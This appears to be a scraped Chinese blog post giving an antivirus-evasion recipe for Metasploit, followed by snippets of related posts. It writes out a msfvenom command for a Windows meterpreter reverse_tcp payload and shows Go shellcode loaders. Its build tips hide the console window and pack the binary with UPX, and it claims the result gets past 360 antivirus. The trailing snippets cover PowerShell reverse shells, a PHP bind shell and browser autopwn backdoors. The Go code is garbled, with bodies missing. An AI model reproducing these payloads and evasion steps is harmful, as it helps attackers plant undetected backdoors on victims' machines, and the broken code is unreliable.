msf是乙個很強大的工具,我經常會在滲透用它來**shell,不過它生成的**後門會被不少殺軟kill,這篇文章只是講講我在msf中乙個簡單的免殺小技巧
msfvenom -p windows/meterpreter/reverse_tcp lport=5555 lhost=192.168.1.100 -e x86/shikata_ga_nai -i 11 -f py > 1.py
建議是生成32位的,如果想生成64位也可以,-e x86/shikata_ga_nai -i 11
是指用x86/shikata_ga_nai
編碼迭代11次,然後生成py檔案
py檔案開啟是shellcode,我們接下來對它進行一點小改造,對於python去執行shellcode的方法,相信小夥伴都已經不陌生,在《python灰帽子》中有講解,我今天要使用的是golang,其實個人認為golang執行shellcode的**是更簡潔的
安裝golang32位(建議32位,與前面對應,在測試過程中,如果32位shellcode配合64位golang加32位gcc,就算把golang的goarch改為386也依舊會失敗,建議一一對應),安裝gcc32位(可以使用tdm-gcc)
package main
/*void call(char *code)
*/import "c"
import "unsafe"
func main()
以上就是全部**
其實golang還有個執行shellcode的方法是不用內聯c語言的,但是我這邊測試能接到**shell,但是執行命令會直接斷開,**我也貼出來
package main
import (
"syscall"
"unsafe"
)func threadexecute(shellcode byte)
threadaddr, _, _ := createthread.call(0, 0, addr, 0, 0, 0)
waitforsingleobject.call(threadaddr, 0xffffffff)
}
關於斷開的原因,希望找出原因的能告知我一下,其實我們會發現,內聯c是比較簡單的
在**所在目錄cmd執行go build
得到二進位制檔案(或者可以用go build -ldflags="-s -w"
減小體積,go build -ldflags="-h windowsgui -s -w"
去掉命令視窗)
可以看到360的靜態查殺和動態查殺都沒有發現
那麼是否正常工作呢
可以看到完全是沒問題的,體積比python編譯出來的小的多,編譯出來是500多kb,然後經過upx壓縮了一下(測試upx壓縮後功能依舊正常),降低到了200多kb
msf反彈shell內網滲透
1.msfvenom p windows x64 meterpreter reverse tcp lhost 本機ip位址 lport 本機監聽埠 f psh reflection o xx.ps1 生成檔案放在目標機目錄下 powershell執行指令碼 powershell windowstyl...
php結合msf反彈內網shell
感謝 perl6大佬分享的姿勢。msf msf use payload php bind php msf exploit handler set payload payload php bind php msf exploit handler set rhost 目標內網ip msf payload...
MSF自動化瀏覽器攻擊與後門安裝
0x01 自動化瀏覽器攻擊介紹 browser autopwn是 metasploit 提供的輔助功能模組。在使用者訪問 web頁面時,它會自動攻擊受害者的瀏覽器。在開始攻擊之前,browser autopwn 能夠檢測使用者使用的瀏覽器型別,browser autopwn 將根據瀏覽器的檢測結果,...